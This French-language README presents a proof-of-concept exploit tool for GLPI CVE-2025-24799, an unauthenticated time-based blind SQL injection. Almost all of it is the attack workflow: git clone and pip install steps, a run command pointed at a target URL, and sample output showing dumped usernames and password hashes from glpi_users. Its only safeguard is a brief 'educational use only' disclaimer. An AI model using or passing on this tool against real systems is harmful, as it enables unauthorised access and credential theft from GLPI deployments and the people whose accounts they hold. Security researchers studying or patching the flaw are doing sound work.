
Exploite GLPI CVE-2025-24799 via une injection SQL aveugle non authentifiée basée sur le temps pour extraire les noms d'utilisateurs et les hashs de mots de passe de glpi_users pour des tests de sécurité autorisés.
CVE-2025-24799 est un exploit de preuve de concept (PoC) ciblant GLPI.
Cet exploit démontre une injection SQL non authentifiée (aveugle basée sur le temps) pour extraire les identifiants utilisateur.
Avertissement : Ce PoC est à des fins éducatives uniquement. Ne l'utilisez pas sur des systèmes sans autorisation.
glpi_users et les colonnes requises (name et password)git clone https://github.com/Rosemary1337/CVE-2025-24799.git
cd CVE-2025-24799
pip install -r requirements.txt
Prérequis :
requests,colorama,beautifulsoup4
python3 main.py -u <TARGET_URL>
python3 main.py -u http://target.com/index.php/ajax
| Flag | Description | Requis | Défaut |
|---|---|---|---|
-u, --url | URL cible | Oui | - |
La console affiche :
[•][✔][✖][i]Exemple :
[•] Exploiting CVE-2025-24799...
[✔] Table 'glpi_users' found.
[✔] Required columns verified.
[i] Starting credential extraction...
[+] Credential 1: admin:5f4dcc3b5aa765d61d8327deb882cf99
[+] Credential 2: user:123456
[*] Extraction complete.
Je suis un développeur actif qui aime créer des outils et partager ses connaissances. Vous pouvez me joindre via :